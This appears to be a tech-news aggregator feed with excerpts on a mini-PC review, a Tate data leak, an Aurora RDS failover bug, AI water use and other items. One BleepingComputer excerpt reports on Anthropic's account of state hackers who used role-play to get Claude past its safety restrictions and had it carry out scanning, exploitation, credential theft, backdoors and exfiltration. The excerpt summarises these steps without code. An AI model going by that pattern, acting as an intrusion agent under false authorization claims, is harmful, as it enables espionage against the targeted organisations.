One thing I tested that didn't work is the AC Power Loss setting. You're supposed to be able to tell it to turn on when power is restored—that's great for something like a homelab. But the BIOS setting didn't do anything. I remembered seeing a hardware switch on the board, though, and sure enough! That's how you actually control the AC power loss setting.

Switching to Ubuntu

Getting back to the A2000, I decided to switch gears and try Ubuntu from an Arm ISO install via USB flash drive. The process was easy enough (I didn't have to change anything in the BIOS), and Ubuntu installed without a hitch.

The A2000's drivers were automatically installed, and I was off to the races.

AI is obviously faster on the GPU (total system power draw was around 94W):

Minisforum MS-R1 AI benchmark on RTX A2000

And GravityMark, a good proxy for how games will run on a given GPU, ran fine too, increasing the score over the iGPU from 3,037 to 16,679 .

Conclusion

Having a full PCI Express slot in here is nice. Coupled with the extra included U.2 and M.2 adapters, it's clear Minisforum thinks of this thing as a good homelab box. They even published guides for installing Proxmox (a community maintained version) and Jellyfin with iGPU acceleration. Considering expansion-options-per-cubic meter, this has all other Arm machines beat, including the Mac mini.

Honestly, this works fine as an Arm desktop, certainly better than any SBC. But Intel and AMD exist, and so does Apple, for that matter, and that makes this a bad value where it stands today , in the $500-600 range. Unless you're an Arm enthusiast, you should save some money and get a different mini PC—even one of Minisforum's other MS-series desktops . Or if you can afford $600 bucks, buy the best value Arm desktop on the market, the M4 Mac mini . Of course, that thing can't run bare metal Linux , so take that into account.

I like that it exists. And I like that Cix and Minisforum are trying to shake up the Arm desktop market a bit. But it's still half-baked:

  • Can performance and power issues be fixed in firmware?
  • Will they get all the drivers mainlined so all features work in every Linux distro?
  • Windows can run on here, but will Nvidia ever release GPU drivers for Windows on Arm?

I'm not sure. But I will try gaming in Linux on here soon, and some other tests. So make sure you follow this blog's RSS feed or subscribe over on YouTube , if you want to follow along!

You can buy the Minisforum MS-R1 from Minisforum's online store, starting around $500 at the time of this writing.

stickertop.art

Lobsters
stickertop.art
2025-11-14 18:38:46
Comments...
Original Article

Jack


Welcome to stickertop.art

Discover a unique collection of laptops adorned with creative stickers from around the world.

This project celebrates the art and culture of laptop personalization: each laptop tells a story through its stickers and gives us a glimpse of the personality of its owner.

Personal details of Tate galleries job applicants leaked online

Guardian
www.theguardian.com
2025-11-14 18:38:03
Sensitive information relates to more than 100 individuals and their referees Personal details submitted by applicants for a job at Tate art galleries have been leaked online, exposing their addresses, salaries and the phone numbers of their referees, the Guardian has learned. The records, running t...
Original Article

Personal details submitted by applicants for a job at Tate art galleries have been leaked online, exposing their addresses, salaries and the phone numbers of their referees, the Guardian has learned.

The records, running to hundreds of pages, appeared on a website unrelated to the government-sponsored organisation, which operates the Tate Modern and Tate Britain galleries in London, Tate St Ives in Cornwall and Tate Liverpool.

The data includes details of applicants’ current employers and education, and relates to the Tate’s hunt for a website developer in October 2023. Information about 111 individuals is included. They are not named but their referees are, sometimes with mobile numbers and personal email addresses. It was not immediately clear how long the data had been circulating online.

Max Kohler, a 29-year-old computer programmer, discovered his data appeared in the leak on Thursday after one of the referees on his application was emailed by a stranger who had seen the data dump online.

Kohler found that it included his last salary, the name of his current employer, and names, emails and addresses of his other referees, as well as lengthy answers he had given to job application questions.

“It’s very disappointing and disillusioning,” he said. “You spend time putting in all this sensitive information, salaries from previous jobs, home addresses, and they don’t take care of this information, and have it floating around in public.

“They should take it down, apologise and there should be a report into how this happened and what they are going to do to ensure it does not happen again. It must be mistrained staff or process error.”

The number of data security incidents reported to the UK’s Information Commissioner’s Office (ICO) continues to rise . In 2022 there were just over 2,000 incidents reported per quarter; that has increased to more than 3,200 between April and June this year.

Kate Brimsted, a partner at the law firm Shoosmiths and an expert in data privacy, information law and cyber security, said: “A breach doesn’t have to be deliberate, and while the ransomware attacks get the headlines, the majority of breaches today are through error. It’s just as important to have checks and processes as part of organisations’ day-to-day practices. We are all fallible. It’s really hard work managing your own data. It is difficult and sometimes boring, but is important.”

The ICO, which regulates data protection in the UK, said: “Organisations must notify the ICO within 72 hours of becoming aware of a personal data breach, unless it does not pose a risk to people’s rights and freedoms. If an organisation decides that a breach doesn’t need to be reported they should keep their own record of it and be able to explain why it wasn’t reported if necessary.”


A spokesperson for Tate said: “We review all reports thoroughly and are investigating the matter. We have not identified any breach of our systems and wouldn’t comment further while the matter is ongoing.”


Illustration: Guardian Design / Rich Cousins

AI World Clocks

Hacker News
clocks.brianmoore.com
2025-11-14 18:35:22
Comments...
Original Article


Every minute, a new clock is displayed that has been generated by nine different AI models.

Each model is allowed 2000 tokens to generate its clock. Here is its prompt:

Create HTML/CSS of an analog clock showing ${time}. Include numbers (or numerals) if you wish, and have a CSS animated second hand. Make it responsive and use a white background. Return ONLY the HTML/CSS code with no markdown formatting.
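A minimal sketch of what one model's generation step might look like (the SDK and model id here are examples only; the site's actual backend is not described on the page):

# Example only: generate one clock with a 2000-token budget by substituting
# the current time into the prompt above. The SDK and model id are
# illustrative, not the site's actual implementation.
import datetime
import anthropic

client = anthropic.Anthropic()
time_str = datetime.datetime.now().strftime("%I:%M %p")

prompt = (
    f"Create HTML/CSS of an analog clock showing {time_str}. "
    "Include numbers (or numerals) if you wish, and have a CSS animated second hand. "
    "Make it responsive and use a white background. "
    "Return ONLY the HTML/CSS code with no markdown formatting."
)

message = client.messages.create(
    model="claude-sonnet-4-5",  # one of the nine models would go here
    max_tokens=2000,            # the per-clock token budget
    messages=[{"role": "user", "content": prompt}],
)

clock_html = message.content[0].text  # drop this straight into the page
print(clock_html)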

Created by Brian Moore . You can also follow him on Instagram . Idea inspired by Matthew Rayfield .

Anthropic claims of Claude AI-automated cyberattacks met with doubt

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 18:31:16
Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model. [...]...
Original Article

Malicious artificial Intelligence

Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model.

However, Anthropic's claims immediately sparked widespread skepticism, with security researchers and AI practitioners calling the report " made up " and accusing the company of overstating the incident.

Others argued the report exaggerated what current AI systems can realistically accomplish.


"This Anthropic thing is marketing guff. AI is a super boost but it's not skynet, it doesn't think, it's not actually artificial intelligence (that's a marketing thing people came up with)," posted cybersecurity researcher Daniel Card .

Much of the skepticism stems from Anthropic providing no indicators of compromise (IOCs) behind the campaign. Furthermore, BleepingComputer's requests for technical information about the attacks were not answered.

Claims attacks were 80-90% AI-automated

Despite the criticism, Anthropic claims that the incident represents the first publicly documented case of large-scale autonomous intrusion activity conducted by an AI model.

The attack, which Anthropic says it disrupted in mid-September 2025, used its Claude Code model to target 30 entities, including large tech firms, financial institutions, chemical manufacturers, and government agencies.

Although the firm says only a small number of intrusions succeeded, it highlights the operation as the first of its kind at this scale, with AI allegedly autonomously conducting nearly all phases of the cyber-espionage workflow.

"The actor achieved what we believe is the first documented case of a cyberattack largely executed without human intervention at scale—the AI autonomously discovered vulnerabilities… exploited them in live operations, then performed a wide range of post-exploitation activities," Anthropic explains in its report .

"Most significantly, this marks the first documented case of agentic AI successfully obtaining access to confirmed high-value targets for intelligence collection, including major technology corporations and government agencies."

Attack architecture
Source: Anthropic

Anthropic reports that the Chinese hackers built a framework that manipulated Claude into acting as an autonomous cyber intrusion agent, instead of just receiving advice or using the tool to generate fragments of attack frameworks as seen in previous incidents .

The system used Claude in tandem with standard penetration testing utilities and a Model Context Protocol (MCP)-based infrastructure to scan, exploit, and extract information without direct human oversight for most tasks.

The human operators intervened only at critical moments, such as authorizing escalations or reviewing data for exfiltration, which Anthropic estimates to be just 10-20% of the operational workload.

The attack was conducted in six distinct phases, summarized as follows:

  • Phase 1 – Human operators selected high-value targets and used role-playing tactics to deceive Claude into believing it was performing authorized cybersecurity tasks, bypassing its built-in safety restrictions.
  • Phase 2 – Claude autonomously scanned network infrastructure across multiple targets, discovered services, analyzed authentication mechanisms, and identified vulnerable endpoints. It maintained separate operational contexts, allowing parallel attacks without human oversight.
  • Phase 3 – The AI generated tailored payloads, conducted remote testing, and validated vulnerabilities. It created detailed reports for human review, with humans only stepping in to approve escalation to active exploitation.
  • Phase 4 – Claude extracted authentication data from system configurations, tested credential access, and mapped internal systems. It independently navigated internal networks, accessing APIs, databases, and services, while humans authorized only the most sensitive intrusions.
  • Phase 5 – Claude used its access to query databases, extract sensitive data, and identify intelligence value. It categorized findings, created persistent backdoors, and generated summary reports, requiring human approval only for final data exfiltration.
  • Phase 6 – Throughout the campaign, Claude documented each step in a structured format, including discovered assets, credentials, exploit methods, and extracted data. This enabled seamless handoffs between threat actor teams and supported long-term persistence in compromised environments.
Phases of the attack
Source: Anthropic

Anthropic further explains that the campaign relied more on open-source tools rather than bespoke malware, demonstrating that AI can leverage readily available off-the-shelf tools to conduct effective attacks.

However, Claude wasn’t flawless, as, in some cases, it produced unwanted “hallucinations,” fabricated results, and overstated findings.

Responding to this abuse, Anthropic banned the offending accounts, enhanced its detection capabilities, and shared intelligence with partners to help develop new detection methods for AI-driven intrusions.


We Uncovered a Race Condition in Aurora RDS

Hacker News
hightouch.com
2025-11-14 18:20:08
Comments...
Original Article

Much of the developer world is familiar with the AWS outage in us-east-1 that occurred on October 20th due to a race condition bug inside a DNS management service. The backlog of events we needed to process from that outage on the 20th stretched our system to the limits, and so we decided to increase our headroom for event handling throughput. When we attempted that infrastructure upgrade on October 23rd, we ran into yet another race condition bug in Aurora RDS. This is the story of how we figured out it was an AWS bug (later confirmed by AWS) and what we learned.

Background

The Hightouch Events product enables organizations to gather and centralize user behavioral data such as page views, clicks, and purchases. Customers can setup syncs to load events into a cloud data warehouse for analytics or stream them directly to marketing, operational, and analytics tools to support real-time personalization use cases.

Here is the portion of Hightouch’s architecture dedicated to our events system:

A diagram showing the architecture of Hightouch's events system

Hightouch events system architecture

Our system scales on three levers: Kubernetes clusters that contain event collectors and batch workers, Kafka for event processing, and Postgres as our virtual queue metadata store.

When our pagers went off during the AWS outage on the 20th, we observed:

  • Services were unable to connect to Kafka brokers managed by AWS MSK.
  • Services struggled to autoscale because we couldn’t provision new EC2 nodes.
  • Customer functions for realtime data transformation were unavailable due to AWS STS errors, which caused our retry queues to balloon in size.

Kafka’s durability meant that no events were dropped once they were accepted by the collectors, but there was a massive backlog to process. Syncs with consistently high traffic or with enrichments that needed to call slower 3rd party services took longer to catch up and were testing the limits of our (small) Postgres instance’s ability to act as a queue for the batch metadata.

As an aside, at Hightouch, we start with Postgres where we can. Postgres queues serve our non-events architecture well at ~1M syncs/day and for events scaled to 500K events per second at ~1s end-to-end latency on a small Aurora instance.

After observing the events on the 20th, we wanted to upsize the DB to give us more headroom. Given that Aurora supports fast failovers for scaling up instances, we decided to proceed with an upgrade on Oct 23rd without a scheduled maintenance window.

AWS Aurora RDS

The central datastore for real-time streaming and warehouse delivery of customer events uses Amazon Aurora PostgreSQL.

Aurora's architecture differs from traditional PostgreSQL in a crucial way: it separates compute from storage. An Aurora cluster consists of:

  • One primary writer instance that handles all write operations
  • Multiple read replica instances that handle read-only queries
  • A shared storage layer that all instances access, automatically replicated across multiple availability zones

This architecture enables fast failovers and efficient read scaling, but as we'd discover, it also introduces unique failure modes.

A failover is the process of promoting a read replica to become the new primary writer - typically done automatically when the primary fails, or manually triggered for maintenance operations like ours. When you trigger a failover in the AWS console:

  1. Aurora designates a read replica as the new primary
  2. The storage layer grants write privileges to the new primary
  3. The cluster endpoint points to the new writer
  4. The old primary becomes a read replica (if it's still healthy)
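The same operation can be scripted. As a rough sketch (not Hightouch’s actual tooling, and with made-up cluster and instance identifiers), a manual failover via boto3 looks something like this:

import time
import boto3

rds = boto3.client("rds", region_name="us-east-1")

CLUSTER_ID = "events-aurora-cluster"        # hypothetical cluster identifier
TARGET_INSTANCE = "events-aurora-reader-2"  # the upsized reader we want promoted

def current_writer(cluster_id):
    """Return the instance identifier Aurora currently advertises as the writer."""
    cluster = rds.describe_db_clusters(DBClusterIdentifier=cluster_id)["DBClusters"][0]
    for member in cluster["DBClusterMembers"]:
        if member["IsClusterWriter"]:
            return member["DBInstanceIdentifier"]
    raise RuntimeError("no writer advertised")

print("writer before failover:", current_writer(CLUSTER_ID))

# Ask Aurora to promote the target reader.
rds.failover_db_cluster(
    DBClusterIdentifier=CLUSTER_ID,
    TargetDBInstanceIdentifier=TARGET_INSTANCE,
)

# Poll until the cluster advertises the expected writer, or give up after ~5 minutes.
for _ in range(60):
    time.sleep(5)
    if current_writer(CLUSTER_ID) == TARGET_INSTANCE:
        print("failover complete, new writer:", TARGET_INSTANCE)
        break
else:
    print("failover did not stick; writer is still", current_writer(CLUSTER_ID))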

The diagram below explains how Hightouch Events uses Aurora.

Diagram: How Hightouch Events uses Aurora

The Plan

This was our upgrade plan:

  1. Add another read replica (instance #3) to maintain read capacity during the upgrade.
  2. Upgrade the existing reader (instance #2) to the target size and give it the highest failover priority.
  3. Trigger a failover to promote instance #2 as the new writer (expected downtime less than 15s, handled gracefully by our backend).
  4. Upgrade the old writer (instance #1) to match the size and make it a reader.
  5. Remove the temporary extra reader (instance #3).

The AWS docs supported this approach and we had already tested the process successfully in a staging environment while performing a load test, so we were confident in the correctness of the procedure.

The Upgrade Attempt

At 16:39 EDT on October 23, 2025, we triggered the failover to the newly-upgraded instance #2. The AWS Console showed the typical progression: parameter adjustments, instance restarts, the usual status updates.

Then the page refreshed. Instance #1, the original writer, was still the primary. The failover had reversed itself.

According to AWS, everything was healthy; the cluster looked fine across the board. But our backend services couldn’t execute write queries. Restarting the services cleared the errors and restored normal operation, but the upgrade had failed.

We tried again at 16:43. Same result: brief promotion followed by immediate reversal.

Two failed failovers in five minutes. Nothing else had changed: no code updates, no unusual queries, no traffic spikes. We had successfully tested this exact procedure in a staging environment under load earlier in the day. We checked our process for mistakes and searched online for anyone else who had encountered this issue, but found nothing. Nothing obvious could explain why Aurora was refusing to complete the failover in this cluster. We were perplexed.

The Investigation

We first checked database metrics for anything unusual. There was a spike in connection count, network traffic, and commit throughput to the read replica (instance #2) during the failover.

The higher commit throughput could have been due to replication or the execution of write queries. The other two metrics simply indicated a higher query volume.

We checked the read query traffic from the app (graph below) and found no change during this period. This told us the extra traffic to instance #2 came from our backend services, which are supposed to connect to the writer instance.

Graph: Query traffic from the Hightouch app

When we looked at the backend application logs, we found this error in some pods: DatabaseError: cannot execute UPDATE in a read-only transaction.

Backend application logs

Our services do not connect directly to the writer instance, but rather to a cluster endpoint that points to the writer. This could mean one of three things:

  1. The pods did not get the signal that the writer had changed - i.e. the cluster did not terminate the connection.
  2. The cluster endpoint incorrectly pointed to a reader instance.
  3. The pod was connected to the writer, but the write operation was rejected at runtime.

We did not find any evidence supporting or disproving #1 in the application logs. We had a strong suspicion it was either #2 or #3. We downloaded the database logs to take a closer look and found something interesting. In both the promoted reader and the original writer, we found the same sequence of logs:

2025-10-23 20:38:58 UTC::@:[569]:LOG:  starting PostgreSQL...
...
...
...
LOG:  database system is ready to accept connections
LOG:  server process (PID 799) was terminated by signal 9: Killed
DETAIL:  Failed process was running: <write query from backend application>
LOG:  terminating any other active server processes
FATAL:  Can't handle storage runtime process crash
LOG:  database system is shut down

This led us to a hypothesis:

During the failover window, Aurora briefly allowed both instances to process writes. The distributed storage layer rejected the concurrent write operations, causing both instances to crash.

We expect Aurora’s failover orchestration to do something like this:

  1. Stop accepting new writes. Clients can expect connection errors until the failover completes.
  2. Finish processing in-flight write requests.
  3. Demote the writer and simultaneously promote the reader.
  4. Accept new write requests on the new writer.

There was clearly a race condition between steps 3 & 4.
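One way to observe a window like this directly, rather than inferring it from crash logs, is to poll both instance endpoints during a failover and check pg_is_in_recovery(), which returns false on any instance that believes it can accept writes. A minimal sketch (endpoints and credentials are placeholders, and this is not the monitoring Hightouch actually runs):

import time
import psycopg2

# Placeholder instance endpoints; connect to each instance directly, not the cluster endpoint.
ENDPOINTS = {
    "instance-1": "instance-1.xxxx.us-east-1.rds.amazonaws.com",
    "instance-2": "instance-2.xxxx.us-east-1.rds.amazonaws.com",
}

def is_replica(host):
    """True if the instance is in recovery (a reader), False if it would accept writes."""
    conn = psycopg2.connect(
        host=host, dbname="postgres", user="monitor", password="***", connect_timeout=2
    )
    try:
        with conn.cursor() as cur:
            cur.execute("SELECT pg_is_in_recovery()")
            return cur.fetchone()[0]
    finally:
        conn.close()

while True:
    roles = {}
    for name, host in ENDPOINTS.items():
        try:
            roles[name] = "replica" if is_replica(host) else "WRITER"
        except Exception as exc:
            roles[name] = "unreachable (" + exc.__class__.__name__ + ")"
    print(time.strftime("%H:%M:%S"), roles)
    if list(roles.values()).count("WRITER") > 1:
        print("!! both instances are advertising themselves as writers")
    time.sleep(1)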

Testing the Hypothesis

To validate the theory, we performed a controlled failover attempt. This time:

  1. We scaled down all services that write to the database
  2. We triggered the failover again
  3. We monitored for storage runtime crashes

By eliminating concurrent writes, the failover completed successfully. This strongly reinforced the race-condition hypothesis.

AWS Confirms the Root Cause

We escalated the findings and log patterns to AWS. After an internal review, AWS confirmed that:

The root cause was due to an internal signaling issue in the demotion process of the old writer, resulting in the writer being unchanged after the failover.

They also confirmed that there was nothing unique about our configuration or usage that would trigger the bug. The conditions that caused it were not under our control.

AWS has indicated a fix is on their roadmap, but as of now, the recommended mitigation aligns with our solution: use Aurora’s Failover feature on an as-needed basis and ensure that no writes are executed against the DB during the failover.

Final State

With the race condition understood and mitigated, we:

  • Successfully upsized the cluster in us-east-1
  • Updated our internal playbooks to pause writers before an intentional failover
  • Added monitoring to detect any unexpected writer role advertisement flips

Takeaways

The following principles were reinforced during this experience:

  1. Prepare for the worst in any migration - you could end up in your desired end state, beginning state, or an in-between state - even for services you trust. Ensuring you’re ready to redirect traffic and handle brief outages in dependencies will minimize downtime.
  2. The importance of good observability cannot be emphasized enough. The “brief writer advertisement” was only detectable because we were monitoring queries to each instance in Datadog and had access to database logs in RDS.
  3. For large-scale distributed systems, isolating the impact any single component can have on the system helps both uptime and maintenance. It helps a lot if the design allows for such events without completely shutting down the system.
  4. Test setups are not always representative of production environments. Even though we practiced the upgrade process during a load test in a staging region, we could not reproduce the exact conditions that caused the race condition in Aurora. AWS confirmed that there was nothing specific about our traffic pattern that would trigger it.

If challenges like this investigation sound interesting, we encourage you to check out our careers page

Show HN: Dumbass Business Ideas

Hacker News
dumbassideas.com
2025-11-14 18:18:11
Comments...
Original Article

Want your REAL product featured here? Submit for review!

Dumbass

Business Ideas

The world's finest collection of terrible entrepreneurship

100% terrible zero exit strategy

Using any of these ideas for anything other than entertainment purposes is a SIN 😈

Curating your next bad idea...

Approvals for new dumbass ideas may take up to 12 hours
(our quality control team is very busy not doing their job 🫠)

The AI water issue is fake

Lobsters
andymasley.substack.com
2025-11-14 17:56:12
Comments...
Original Article

AI data centers use water. Like any other industry that uses water, they require careful planning. If an electric car factory opens near you, that factory may use just as much water as a data center. The factory also requires careful planning. But the idea that either the factory or AI is using an inordinate amount of water that merits any kind of boycott or national attention as a unique, serious environmental issue is innumerate. On the national, local, and personal level, AI is barely using any water, and unless it grows 50 times faster than forecasts predict, this won’t change. I’m writing from an American context and don’t know as much about other countries. But at least in America, the numbers are clear and decisive.

The idea that AI’s water usage is a serious national emergency caught on for three reasons:

  • People get upset at the idea of a physical resource like water being spent on a digital product, especially one they don’t see value in, and don’t factor in just how often this happens everywhere.

  • People haven’t internalized how many other people are using AI. AI’s water use looks ridiculous if you think of it as a small marginal new thing. It looks tiny when you divide it by the hundreds of millions of people using AI every day.

  • People are easily alarmed by contextless large numbers, like the number of gallons of water a data center is using. They compare these large numbers to other regular things they do, not to other normal industries and processes in society.

Together, these create the impression that AI water use is a problem. It is not. Regardless of whether you love or hate AI, it is not possible to actually look at the numbers involved without coming to the conclusion that this is a fake problem. This problem’s hyped up for clicks by a lot of scary articles that completely fall apart when you look at the simple easy-to-access facts on the ground. These articles have contributed to establishing fake “common wisdom” among everyday people that AI uses a lot of water.

This post is not at all about other issues related to AI, especially the very real problems with electricity use. I want to give you a complete picture of the issue. I think AI and the national water system are both so wildly interesting that they can be really fun to read about even if you’re not invested in the problem.

All U.S. data centers (which mostly support the internet, not AI) used 200–250 million gallons of freshwater daily in 2023. The U.S. consumes approximately 132 billion gallons of freshwater daily. The U.S. circulates a lot more water day to day, but to be extra conservative I’ll stick to this measure of its consumptive use; see here for a breakdown of how the U.S. uses water. So data centers in the U.S. consumed approximately 0.2% of the nation’s freshwater in 2023. I repeat this point a lot, but Americans spend half their waking lives online. A data center is just a big computer that hosts the things you do online. Everything we do online interacts with and uses energy and water in data centers. When you’re online, you’re using a data center as you would a personal computer. It’s a miracle that something we spend 50% of our time using only consumes 0.2% of our water.

However, the water that was actually used onsite in data centers was only 50 million gallons per day; the rest was used to generate electricity offsite. Most electricity is generated by heating water to spin turbines, so when data centers use electricity, they also use water. Only 0.04% of America’s freshwater in 2023 was consumed inside data centers themselves. This is 3% of the water consumed by the American golf industry.

How much of this is AI? Probably 20%. So AI consumes approximately 0.04% of America’s freshwater if you include onsite and offsite use, and only 0.008% if you include just the water in data centers.

So AI, which is now built into every facet of the internet that we all use for 7 hours every single day, that includes the most downloaded app for 7 months straight, that also includes many normal computer algorithms beyond chatbots, and that so many people around the world are using that Americans only make up 16% of the user base, is using 0.008% of America’s total freshwater. This 0.008% is approximately 10,600,000 gallons of water per day.
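For readers who want to check the arithmetic, here is the same chain of estimates in a few lines of Python; the inputs are simply the figures cited above.

# National shares, using the figures cited above.
US_FRESHWATER = 132e9   # gallons/day consumed nationwide
ALL_DC_TOTAL = 225e6    # gallons/day, onsite + offsite (midpoint of 200-250 million)
ALL_DC_ONSITE = 50e6    # gallons/day used inside data centers themselves
AI_SHARE = 0.20         # AI's rough share of data center load

print(ALL_DC_TOTAL / US_FRESHWATER)              # ~0.0017 -> roughly 0.2%
print(ALL_DC_ONSITE / US_FRESHWATER)             # ~0.0004 -> roughly 0.04%
print(AI_SHARE * ALL_DC_ONSITE / US_FRESHWATER)  # ~0.00008 -> roughly 0.008%
print(0.00008 * US_FRESHWATER)                   # ~10.6 million gallons/day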

I’m from a town of 16,000 people. It looks like this:

All AI in all American data centers is collectively using 8 times as much water as the local water utility in my town provides to consumers. You should be exactly as worried about AI’s current national water usage as you would be if you found out that 8 additional towns of 16,000 people each were going to be built around the country.

Here’s data center water use compared to a lot of other American industries:

And here’s a comparison to how much water different American agricultural products use, the main way water is used in America:

Forecasts imply that American data center electricity usage could triple by 2030. Because water use is approximately proportionate to electricity usage, this implies data centers themselves may consume 150 million gallons of water per day onsite, 0.12% of America’s current freshwater consumption.

So the water all American data centers will consume onsite in 2030 is equivalent to:

If you found out that U.S. steel production was expected to increase by 8% in 2030, the amount that would cause you to worry about water is how worried you should be about data center water usage by 2030.

How much of this will be AI? Almost all this growth will be driven by AI, but because AI is only 20% of data center power use, its growth will have to be huge to triple total power usage. One forecast says AI energy use in America will be multiplied by 10 by 2030. Because water use is proportionate to energy use, we can multiply AI’s water use by 10 as well.

So in 2030, AI in data centers specifically will be using 0.08% of America’s freshwater. This means it will rise to the level of 5% of America’s current water used on golf courses, or 5% of U.S. steel production, or be about 173 square miles of irrigated corn farms.

The average American’s consumptive lifestyle freshwater footprint is 422 gallons per day. This means that in 2023, AI data centers used as much water as the lifestyles of 25,000 Americans, 0.007% of the population. By 2030, they might use as much as the lifestyles of 250,000 Americans, 0.07% of the population. Not nothing, but 250,000 people over 5 years is just 4% of America’s current rate of population growth. If you found out that immigration plus new births in America would increase by 4% of the current rate, would your first thought be “We can’t afford that, it’s way too much water”?

This is more contentious, but all this is in the context of AI potentially boosting U.S. and global GDP by whole percentage points. Most forecasts imply that AI will boost total U.S. GDP by at least 1%. If we judge industries by how much they’re contributing, AI data centers’ direct onsite usage will collectively be 0.08% of water consumption by 2030 while contributing at least 1% to GDP. Maybe this won’t happen, but in worlds where this doesn’t happen, AI companies won’t be able to afford a huge buildout either. If AI is a bubble, the bubble will have to pop sometime before AI data center water usage hits 10x what it currently is in America. Your predictions for how much water AI will use and your predictions for how much real economic value it’s going to provide have to be related in some way.

Because data centers are using the same normal amounts of water as many other industries, there are no places (so far) where it seems like data centers have raised water costs at all or harmed local water access. I have a much longer deep dive on that here. I won’t repeat all the arguments. If you’re skeptical, I’d suggest reading that first.

The only exception to this rule is the construction of data centers, which has in a few places caused issues for local groundwater. This is bad, but it’s purely an issue of constructing a large building. It has nothing to do with AI specifically, for the same reason that debris from a bank being constructed would tell you nothing about how banks normally impact a community. There’s a famous New York Times headline that comes up in most conversations about AI and water use:

But the reason their taps ran dry (which the article itself says) was entirely because of sediment buildup in groundwater from construction. It had nothing to do with the data center’s normal operations (it hadn’t begun operating yet, and doesn’t even draw from local groundwater). The residents were wronged by Meta here and deserve compensation, but this is not an example of a data center’s water demand harming a local population.

Basically every single news story that’s broken about this has been misleading for similar, really simple reasons that are easy to cross-check and verify. I’ve written up my issues with most major news coverage of AI and water below. You don’t have to take my word for it; you can look at each one and see if I’m right or wrong for yourself.

The Georgia data center is only using ~2% of the county’s water. For comparison, a pharmaceutical manufacturing plant is using ~4% of the county’s water, and a plant that builds Rivian cars is using about the same amount of water as Meta’s data center. The data center is functioning like any other normal industry in the county.

No matter where you look, whether it’s the place with the highest percentage of local water going to data centers (The Dalles, Oregon), the place with the most water in total going to data centers (Loudoun County, Virginia), or the place with the highest water stress where lots of new data centers are being built (Maricopa County, Arizona), data centers are not negatively impacting locals’ freshwater access at all, because they are behaving like any normal private industry. You can follow each link in the parentheses for a breakdown of how that county uses water and how data centers affect it.

The only difference is that data centers contribute way, way, way more tax revenue per unit of water used than most other industries. Take Maricopa County in Arizona. The county is home to Phoenix and sits in a desert where water is pumped in from elsewhere. It’s also one of the places in the country where the most new data centers are being built.

Circle of Blue, a nonprofit research organization that seems generally trusted, estimates that data centers in Maricopa County will use 905 million gallons of water in 2025. For context, Maricopa County golf courses use 29 billion gallons of water each year. In total, the county uses 2.13 billion gallons of water every day, or 777 billion gallons every year. Data centers make up 0.12% of the county’s water use. Golf courses make up 3.8%.
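The county-level shares follow directly from those figures; a quick check in Python:

# Maricopa County shares, using the figures cited above.
county_per_year = 2.13e9 * 365   # ~777 billion gallons/year
data_centers = 905e6             # gallons/year (Circle of Blue estimate for 2025)
golf_courses = 29e9              # gallons/year

print(data_centers / county_per_year)   # ~0.0012 -> roughly 0.12%
print(golf_courses / county_per_year)   # ~0.037  -> roughly 3.8%
print(golf_courses / data_centers)      # ~32x more water on golf courses than data centers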

Data centers are so much more efficient with their water that they generate 50x as much tax revenue per unit of water used as golf courses in the county.

So even though data centers are using 30x less water than golf courses, they bring in more total tax revenue.

Some people see this, and react with something like “Well I don’t think golf courses OR data centers should be built in the desert.” At some point this becomes an argument against anyone living in deserts in the first place. If you want to have a gigantic city in the desert, like Phoenix, that city needs some way of supporting itself with taxes, and giving jobs to the people who live there. Most industries use significant amounts of water. If Phoenix is going to exist, it’s going to need private industries built around it that are using some water. We have two options here:

  • Build industries that generate huge amounts of tax revenue relative to the water they use. Data centers fall into this category (though they don’t provide many jobs).

  • Do not build cities in the desert in the first place.

Arguments against data centers existing in the desert because they harm water systems there also often apply to building cities in the desert in the first place. It’s fine and consistent to say that Phoenix shouldn’t exist because it’s unnaturally pumping water from hundreds of miles away, but it’s inconsistent to say that Phoenix should exist, that its water bills should be kept as low as possible, but also that no industries that use any water should be built there.

In low water scarcity areas, data centers can actually benefit water access, because water there isn’t zero-sum. More people buying water doesn’t lead to higher prices; it gives the utility more money to spend on drawing more water and improving infrastructure. It’s the same reason grocery prices don’t go up when more people move to a town. More people shop at the grocery store, which allows the grocery store to invest more in getting food, and it makes a profit it can use to upgrade other services, so on net more people buying from a store often makes food prices fall, not rise. Studies have found that utilities pumping more water, on average, causes prices to fall, not rise.

In high water scarcity areas, city and state leaders have already thought a lot about water management. They can regulate data centers the same ways they regulate any other industries. Here water is more zero sum, but data centers just end up raising the cost of water for other private businesses, not for homes. Data centers are subject to the economics of water in high scarcity areas, and often rely more on air cooling rather than water cooling because the ratio of electric costs to water costs is lower.

This seems fine if we think of data centers as any other industry. Lots of industries in America use water. AI is using a tiny fraction compared to most, and generating way, way more revenue per gallon of water consumed than most. Where water is scarce, AI data centers should be able to bid against other commercial and industrial businesses for it. So far, I haven’t seen any arguments against building data centers in high water stress areas that aren’t basically saying “we shouldn’t have any industries at all in places with high water stress” which seems wrong. People still choose to live in places like Phoenix and expect to have strong local governments that need a big tax base to function well. If you’re against industry in high water stress areas period, you need to be against people living in Phoenix in the first place, which means their water bills should probably rise anyway.

There are many cases of data centers being built, providing lots of tax revenue for the town and water utility, and the locals benefiting from improved water systems. Critics often read this as “buying off” local communities, but there are many instances where these water upgrades just would not have happened otherwise. It’s hard not to see it as a net improvement for the community. If you believe it’s possible for large companies using water to just make reasonable deals with local governments to mutually benefit, these all look like positive-sum trades for everyone involved.

Here are specific examples:

I could go on like this for a while. Maybe you think every one of these is some trick by big tech to buy off communities, but all I’m seeing here is an improvement in local water systems without any examples of equivalent harm elsewhere.

AI data centers are not a notable source of water quality pollution in their host communities. Their cooling water is typically kept in closed loops, any periodic blowdown is routed to a sanitary sewer for treatment or discharged under numeric permit limits, and an increasing share of facilities use highly treated recycled water that would otherwise be released by wastewater plants. By contrast, the largest water quality problems in the United States come from sectors like agriculture and construction.

The EPA’s national assessments repeatedly identify agriculture as the leading source of impairment for rivers and streams due to nutrient and sediment runoff, with continued nitrogen and phosphorus problems that affect drinking water and coastal ecosystems. Construction activity is also a well-documented source of sediment discharges if not controlled. Data centers are not flagged by the EPA in these national problem lists, and they do not handle the kinds of process chemicals or waste streams that typify the industrial categories with effluent guidelines.

